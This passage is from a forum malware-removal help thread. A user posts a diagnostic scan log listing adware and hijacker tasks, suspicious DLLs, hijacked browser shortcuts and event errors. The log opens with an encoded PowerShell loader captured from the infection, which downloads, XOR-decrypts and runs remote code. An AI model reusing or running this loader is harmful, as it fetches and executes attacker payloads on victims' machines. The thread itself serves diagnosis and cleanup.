kAYQBNADAAMABaAGIAaABEAEkAMQBfAHkAYgBaAEYASABoAGkAaQB2ADUAQgBuAGYAeABSAFUAYQBhAHQAawBhADEAZQBBAEsATwBfADUAcgBiADEATQBQAFcAdABPADQATABFAFoAbgBoAGgAVgBPADMAVwBmAE8AMQBVAHEANQBhAE0AVQB1AGQAUgBzADIAWABGAEoASgBxAFIATgBjADAAaABLAEwAMAA1AEcAcwBhAHkAcQA3AFEAbwBWAGMAMgBmAGoAMABaAC0AcQBWAG8AawBfADMAYgBGAFkAcgAyAHMAdwBnAHgAbwBiAHEAWgBRAGgAWgBRAG8AbQBWAHAANwA2AHYANgBkAHgAdgBBADIAaQA2AHgAWQBwADIAaQBVAE0AMwB2AFcAbAB2AEoATQBkADMARQBUAFEAOABLADkAYQBSAGoAOQBaADcASwBxAGcAdQBLAGcAawBsAEYAcgByAEsAMgB2AFIAVwB3ADAAUABoAEsASgBiADQAQQBiAG8AcAAyAGkATwBlAHoAdgBqAEMAbgAxAHIAOAA0AEcATwB0AFAARwAtADAATQBSAEYAdgBoAFgAZwBUAGEANQBxAEIATwBuAEYAbQBCAHEAcgBKAFoAaQBmADQAWAA2AFIAbgA1AFcAbQA3ADQAbABuAFIALQBtAGgAagBDAHQAaABGAGoAaQBUAE4AegBJAHkAcwBtADIAbwBHAFIAVgBfAG4AaAA3AGwANgBMAEcASABXAHAASQBUAEwAcABlAGkAUABVAFgAeQBjAGEAWgBCAGoAZQBoAFQAeQBUADIASgA3AHoASwBxAFoAYQBmAG4AMgBoADIASABKAGwAYwBjAFkAdwB3AGIAcQBPADgAUgA0AE4AbgBBAGkAVAB0AHgAWQBXAFYAXwBtAG4AMABXAHQAZQBvAG0ARgBzAEcAOQBBAGgAaQBWADEAVAA2AFcANQBEADgATABFAHkAQgBNAGkAegBnADYAdQBsAC0ARwAtAE4ARAB0AGUAaQAzAG4AZAAwAEMAXwBMAFYAMgBQAEYAcQAxAFoAMQBoAFEAbQBzAEEAOABVAEwAdQBiAF8ANwBiAHEASQBPAHIAeAB5AFkAWAB0AFIAMABwAHYAUQBvAFgAZAB3AFcAMQBKAHoAWABWAE0ASQBRAFkAMwA3AFYAeABDAHoAZAA0AHkAYQAyAHgAUwBhAHIAbgBhAEcAagBWAC0ASgA4AFcASgAyAEkAUQBLAF8AegBMAGEASAAtAFMASwBWAFoAMwBXAFEAbwA0ADIAZQBfAFQAOAB1ADcAcwBEAGQAcgBlAE0AMgBDAHMARwB6AE4ARABzAG8AcwBDAGEAOQBLADIAZwBpADgAVABKAEcAXwBPAHkAbgA1AHAAVABzADUAcwBlAHoAOQB5AFUASQBkAGcAVgBlAGUAZgA4AGsAQgA0ADEAcwBOADcAUQBtAE0ATABsAHcAegBXAHQATQByAGcAcABMAGUATgBLAHoAUABkADMAegA3AEsAQQBCADUAQgBIAFIASAB0AEsAMQByAFkAOAA3AHcAMQBlADUANgBMAFkAVQBaAHgAVwBjAEoAQwBNADAATAAzAFAAMwB0AFEAdQB0AFMAdwB5AFoAdwBMAGkALQBmAGsANgAxAFEAeAAwAGwAMwBWAFYAXwBUAE8AYgBWAGYAJgByAD0ANwA3ADEAOQA4ADcAOQA5ADMAMAAyADMANQA3ADEAMwAwADUAMQAiADsAJABzAHQAcwBrAD0AIgB7ADAARgAwAEYANwBEADQANwAtADcARQAwADgALQA3AEQAMABCAC0ANwA4ADEAMQAtADcARAAwAEMAMAA1ADAAQgAxADEAMABEAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIAWABRAFUATwAyAFkAVwBZACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
    Task: {86B9E75F-1889-49B5-B36A-35C70EC3D395} - System32\Tasks\Pool Component2 => Rundll32.exe "C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll",#1 <==== ATTENTION
    Task: {9BA7BA7E-1533-4B35-ABFE-16D2D5009E73} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-01-16] (Synaptics Incorporated)
    Task: {9CCB0C95-9CC9-4F2E-8D83-663775D82970} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
    Task: {B1D873D1-5121-42A0-9C92-76FBCD27335F} - System32\Tasks\Sixth => C:\Users\hersheychoco9\AppData\Roaming\Sixth\Sixth.exe [2015-12-10] () <==== ATTENTION
    Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
    Task: {CBDF6C7E-6032-4090-8BEC-C5ACB6DAA611} - System32\Tasks\Ijufcyl => C:\PROGRA~1\SHOPPE~1\Osifch.bat
    Task: {D07CC060-B787-4C15-B547-123801C27E3B} - System32\Tasks\Only-search Updater => C:\Windows\system32\wscript.exe [2014-10-28] (Microsoft Corporation) <==== ATTENTION
    Task: {F61341FC-B312-4A23-8F26-9CB5191CF5BF} - System32\Tasks\SushiLeads => C:\Program Files (x86)\sushileads\ScheduledTask.exe
    Task: {F911CADE-3A34-4F78-B0C3-0F67C227D535} - System32\Tasks\Dell\Dell Product Registration => /boot /LSRC=autolaunch
    Task: {F93F7DEF-97E1-4486-951F-083F68C4E7B3} - System32\Tasks\PCDoctorBackgroundMonitorTask => C:\Program Files\Dell\SupportAssist\uaclauncher.exe [2015-10-29] (PC-Doctor, Inc.)
    Task: {FB55E3BB-58E9-4918-98BC-AE9BBBD84928} - System32\Tasks\ASC8_SkipUac_hersheychoco9 => D:\Utilities\Advanced SystemCare 8\ASC.exe [2015-06-16] (IObit)
    Task: {FC206518-4BBD-4AAE-92C6-10454002C453} - System32\Tasks\Uninstaller_SkipUac_hersheychoco9 => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe [2015-05-20] (IObit)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\ASC8_SkipUac_hersheychoco9.job => D:\Utilities\Advanced SystemCare 8\ASC.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
    Task: C:\Windows\Tasks\Uninstaller_SkipUac_hersheychoco9.job => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
    ShortcutWithArgument: C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27,
    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic
    ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=FCTztutbl10,686b5ee1-c35c-4e6b-9327-255ba3f61a27, --disable-quic

    ==================== Loaded Modules (Whitelisted) ==============

    2015-12-28 23:08 - 2015-12-28 22:01 - 00768368 _____ () C:\Windows\system32\Comvud64.dll
    2015-09-11 18:02 - 2015-09-11 18:02 - 00803488 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2015-04-16 16:55 - 2014-08-19 13:12 - 01356568 _____ () C:\Program Files\Tablet\Pen\libxml2.dll
    2015-12-28 23:08 - 2015-12-22 12:03 - 00342016 _____ () C:\Users\hersheychoco9\AppData\Local\BrowserAir\44.5.0.2\updater.exe
    2014-09-18 13:37 - 2014-07-02 21:55 - 00487144 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Shell\DBRCrawler.exe
    2015-09-21 21:29 - 2014-10-16 09:26 - 00622880 _____ () C:\Program Files (x86)\IObit\LiveUpdate\ProductStatistics.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00028160 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\PoolComponent.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00012800 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\untjptlj.dll
    2015-12-28 23:04 - 2015-12-28 23:04 - 00011264 _____ () C:\Users\hersheychoco9\AppData\Local\Pool Component\{118F9E4E-9E23-FEE4-DA4B-E734A04928EF}\{A2C49E11-7252-8301-FEB0-5D3FFF9EA4C3}.dat
    2015-12-28 22:57 - 2015-12-28 22:57 - 00009216 _____ () C:\Users\hersheychoco9\AppData\Local\ezvtum.dll
    2015-09-21 21:29 - 2013-01-15 17:48 - 00348992 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madExcept_.bpl
    2015-09-21 21:29 - 2013-01-15 17:48 - 00183616 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madBasic_.bpl
    2015-09-21 21:29 - 2013-01-15 17:48 - 00051008 _____ () C:\Program Files (x86)\IObit\IObit Uninstaller\madDisAsm_.bpl
    2014-05-13 21:32 - 2013-12-18 11:53 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
    2014-09-18 13:37 - 2014-07-30 17:37 - 01906464 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\STRestoreAPI.dll
    2014-05-13 21:40 - 2012-11-25 23:19 - 01153384 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\libxml2.dll
    2014-09-18 13:37 - 2012-11-25 23:19 - 00117608 _____ () C:\Program Files (x86)\Dell Backup and Recovery\Components\Restore\zlib1.dll
    2015-12-16 21:07 - 2015-12-10 21:54 - 01583432 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libglesv2.dll
    2015-12-16 21:07 - 2015-12-10 21:54 - 00081224 _____ () C:\Program Files (x86)\Google\Chrome\Application\47.0.2526.106\libegl.dll

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)


    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Roboscan_UpdSrv => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Roboscan_UpdSrv => ""="Service"

    ==================== EXE Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)

    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008i.com -> 008i.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\008k.com -> 008k.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\00hq.com -> 00hq.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0190-dialers.com -> 0190-dialers.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\01i.info -> 01i.info
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\02pmnzy5eo29bfk4.com -> 02pmnzy5eo29bfk4.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\05p.com -> 05p.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\07ic5do2myz3vzpk.com -> 07ic5do2myz3vzpk.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\08nigbmwk43i01y6.com -> 08nigbmwk43i01y6.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\093qpeuqpmz6ebfa.com -> 093qpeuqpmz6ebfa.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0calories.net -> 0calories.net
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0cj.net -> 0cj.net
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\0scan.com -> 0scan.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-britney-spears-nude.com -> 1-britney-spears-nude.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-domains-registrations.com -> 1-domains-registrations.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1-se.com -> 1-se.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001movie.com -> 1001movie.com
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\1001night.biz -> 1001night.biz
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100gal.net -> 100gal.net
    IE restricted site: HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\100sexlinks.com -> 100sexlinks.com

    There are 4788 more sites.


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2013-08-22 07:25 - 2015-12-29 14:05 - 00000831 ____A C:\Windows\system32\Drivers\etc\hosts

    # ::1 localhost

    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\hersheychoco9\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg
    DNS Servers: 208.87.151.17 - 208.87.151.16
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 2) (ConsentPromptBehaviorUser: 0) (EnableLUA: 1)
    Windows Firewall is disabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==

    (Currently there is no automatic fix for this section.)

    HKLM\...\StartupApproved\Run: => "BTMTrayAgent"
    HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
    HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
    HKLM\...\StartupApproved\Run32: => "BrowserAppCoreService"
    HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
    HKLM\...\StartupApproved\Run32: => "AvastUI.exe"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\StartupFolder: => "Curse.lnk"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "GoogleChromeAutoLaunch_DF36D0F5D36790FB776196B8BD1F923B"
    HKU\S-1-5-21-1030869394-3123877279-975090705-1001\...\StartupApproved\Run: => "Advanced SystemCare 8"

    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [{3358EEB9-BF63-4965-BB07-5D87F8455602}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{24B1F9F1-7C3F-41AA-A61E-0509379FACD8}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{1C03B25A-7B58-455E-9B0B-E52E038D3A25}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{D776EB9A-C2A3-41DE-BC72-EFF3929CC640}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{7D3C883A-AEBC-4F58-991D-26810ACBFD9A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{C81A2B31-CC74-4C27-A3FF-2BACD2DD09C3}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{B861BA79-6EB3-4518-85BA-3C4F495C531B}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse
    FirewallRules: [{8A96865D-D43C-464C-B756-000B93387C90}] => (Allow) c:\program files\roboscan\roboscan\rsupdsrv.rse

    ==================== Restore Points =========================

    09-12-2015 13:27:06 Windows Update
    17-12-2015 20:05:00 Scheduled Checkpoint
    25-12-2015 18:53:48 Scheduled Checkpoint
    28-12-2015 23:12:21 PCAcceleratePro restore point
    29-12-2015 00:03:18 Restore Operation
    29-12-2015 16:00:38 Windows Modules Installer

    ==================== Faulty Device Manager Devices =============
     
  8. hersheychoco

    hersheychoco TS Rookie Topic Starter Posts: 30

    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (01/05/2016 04:51:26 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
    Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

    Error: (12/29/2015 05:15:24 PM) (Source: IntelDalJhi) (EventID: 11) (User: )
    Description: Intel(R) Dynamic Application Loader Host Interface Service has encountered an internal connection problem.

    Error: (12/29/2015 05:06:18 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: svchost.exe_PNRPsvc, version: 6.3.9600.17415, time stamp: 0x54504177
    Faulting module name: ntdll.dll, version: 6.3.9600.18146, time stamp: 0x5650b9bb
    Exception code: 0xc0000005
    Fault offset: 0x000000000003dcfe
    Faulting process id: 0x16b8
    Faulting application start time: 0xsvchost.exe_PNRPsvc0
    Faulting application path: svchost.exe_PNRPsvc1
    Faulting module path: svchost.exe_PNRPsvc2
    Report Id: svchost.exe_PNRPsvc3
    Faulting package full name: svchost.exe_PNRPsvc4
    Faulting package-relative application ID: svchost.exe_PNRPsvc5

    Error: (12/29/2015 04:40:40 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: CHOCOYAUTJA)
    Description: Activation of app windows.immersivecontrolpanel_cw5n1h2txyewy!microsoft.windows.immersivecontrolpanel failed with error: -2144927151 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (12/29/2015 04:27:29 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
    Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
    Exception code: 0x40000015
    Fault offset: 0x0008d6fd
    Faulting process id: 0x1374
    Faulting application start time: 0xmbam.exe0
    Faulting application path: mbam.exe1
    Faulting module path: mbam.exe2
    Report Id: mbam.exe3
    Faulting package full name: mbam.exe4
    Faulting package-relative application ID: mbam.exe5

    Error: (12/29/2015 04:26:35 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: mbam.exe, version: 2.3.125.0, time stamp: 0x5612a56b
    Faulting module name: MSVCR100.dll, version: 10.0.40219.325, time stamp: 0x4df2be1e
    Exception code: 0x40000015
    Fault offset: 0x0008d6fd
    Faulting process id: 0x132c
    Faulting application start time: 0xmbam.exe0
    Faulting application path: mbam.exe1
    Faulting module path: mbam.exe2
    Report Id: mbam.exe3
    Faulting package full name: mbam.exe4
    Faulting package-relative application ID: mbam.exe5

    Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
    Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\Users\">.

    Error: (12/29/2015 04:21:28 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
    Description: Windows Search Service failed to process the list of included and excluded locations with the error <30, 0x80004005, "file:///C:\[5aadb3ed-6aa7-4008-967f-1ed3f1b96b88]\ProgramData\Microsoft\Windows\Start Menu\">.

    Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 7010) (User: )
    Description: The index cannot be initialized.

    Details:
    The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)

    Error: (12/29/2015 04:20:29 PM) (Source: Windows Search Service) (EventID: 3058) (User: )
    Description: The application cannot be initialized.

    Context: Windows Application

    Details:
    The specified object cannot be found. Specify the name of an existing object. (HRESULT : 0x80040d06) (0x80040d06)


    System errors:
    =============
    Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (01/05/2016 04:50:12 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (01/05/2016 04:50:12 PM) (Source: Server) (EventID: 2505) (User: )
    Description: The server could not bind to the transport \Device\NetBT_Tcpip_{EF083E6B-E699-4F22-B8D6-6AFFF4638C72} because another computer on the network has the same name. The server could not start.

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The WajaNetEn Monitor service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Update Simple for You service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:58 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The SushiLeadsUpdaterService service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:57 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Network Protocols Adapter service failed to start due to the following error:
    %%3

    Error: (01/05/2016 04:48:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
    Description: The Advanced SystemCare Service 8 service failed to start due to the following error:
    %%2

    Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :0" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.

    Error: (12/29/2015 05:14:10 PM) (Source: NetBT) (EventID: 4321) (User: )
    Description: The name "CHOCOYAUTJA :20" could not be registered on the interface with IP address 192.168.1.4.
    The computer with the IP address 192.168.1.7 did not allow the name to be claimed by
    this computer.


    CodeIntegrity:
    ===================================
    Date: 2016-01-05 17:09:53.308
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Robo\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2016-01-05 17:02:18.858
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files\Roboscan\Roboscan\plugin\realtime\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2016-01-05 16:48:30.085
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 17:12:39.077
    Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\WINDOWS\System32\bootroboscan.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

    Date: 2015-12-29 15:50:33.362
